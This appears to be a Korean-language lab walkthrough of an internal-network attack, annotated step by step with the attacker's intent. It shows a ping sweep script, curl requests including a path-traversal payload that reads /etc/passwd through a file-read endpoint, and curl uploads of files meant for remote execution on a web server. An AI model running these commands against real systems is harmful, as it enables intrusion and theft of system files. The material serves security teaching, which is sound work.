• 실습

1단계. 내부망 정찰 – 네트워크 스캐닝

cmd
코드 복사
python netscan.py

• 공격자는 netscan.py 라는 Python 스크립트를 실행
• 이 스크립트는 아래처럼 ping 명령을 자동으로 생성함:

cmd
코드 복사
ping -n 1 192.168.100.1
ping -n 1 192.168.100.2
...
ping -n 1 192.168.100.255

🔍 목적: 살아있는 호스트(응답하는 IP) 식별

✅ 2단계. 웹 기반 공격 준비 – curl로 악성 파일 다운로드

cmd
코드 복사
curl <http://192.168.100.130:7777/swagger.json>
curl <http://192.168.100.130:7777/read_file>
curl <http://192.168.100.130:7777/read_file?filename=../../../etc/passwd>

🔍 분석:

• 공격자는 내부에 호스팅된 웹 서버에 curl로 접근
• 경로 이동 (../)을 시도해 민감한 파일 접근 (/etc/passwd)까지 시도 → LFI 취약점 공격 시도

✅ 3단계. 악성 파일 업로드 및 실행

cmd
코드 복사
curl -X POST "<http://192.168.100.130:7777/upload>" -F "file=@ZAP_2.14.0_Linux.tar.gz"
curl -X POST "<http://192.168.100.130:7777/upload>" -F "[email protected]"
curl -X POST "<http://192.168.100.130:7777/upload>" -F "[email protected]"

🔍 의도:

• 웹 서버 취약점을 이용해 악성 .py / .php 파일 업로드 시도
• 다음 단계로 원격 실행 목적